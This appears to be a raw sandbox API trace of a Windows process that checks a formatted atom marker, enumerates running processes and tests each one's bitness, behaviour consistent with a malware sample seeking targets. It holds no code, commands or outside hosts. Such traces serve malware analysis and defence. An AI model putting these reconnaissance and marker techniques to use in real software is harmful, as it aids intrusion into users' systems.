	[0074.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.501] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.501] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.502] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetLastError () returned 0x5
	[0074.503] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.503] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.504] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.504] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.504] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.504] CloseHandle (hObject=0x224) returned 1
	[0074.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.504] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.504] CloseHandle (hObject=0x224) returned 1
	[0074.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e720, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.505] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.505] CloseHandle (hObject=0x224) returned 1
	[0074.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d18) returned 0xc0000004
	[0074.539] VirtualAlloc (lpAddress=0x0, dwSize=0x16e18, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e18, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.544] CloseHandle (hObject=0x224) returned 1
	[0074.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.544] CloseHandle (hObject=0x224) returned 1
	[0074.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288b8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.544] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.545] CloseHandle (hObject=0x224) returned 1
	[0074.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.545] CloseHandle (hObject=0x224) returned 1
	[0074.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.545] CloseHandle (hObject=0x224) returned 1
	[0074.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.545] CloseHandle (hObject=0x224) returned 1
	[0074.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.545] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.545] CloseHandle (hObject=0x224) returned 1
	[0074.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.546] CloseHandle (hObject=0x224) returned 1
	[0074.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.546] CloseHandle (hObject=0x224) returned 1
	[0074.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.546] CloseHandle (hObject=0x224) returned 1
	[0074.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.546] CloseHandle (hObject=0x224) returned 1
	[0074.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.547] CloseHandle (hObject=0x224) returned 1
	[0074.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.547] CloseHandle (hObject=0x224) returned 1
	[0074.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.547] CloseHandle (hObject=0x224) returned 1
	[0074.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.547] CloseHandle (hObject=0x224) returned 1
	[0074.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e8b0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.547] CloseHandle (hObject=0x224) returned 1
	[0074.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.548] CloseHandle (hObject=0x224) returned 1
	[0074.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.548] CloseHandle (hObject=0x224) returned 1
	[0074.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.548] CloseHandle (hObject=0x224) returned 1
	[0074.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
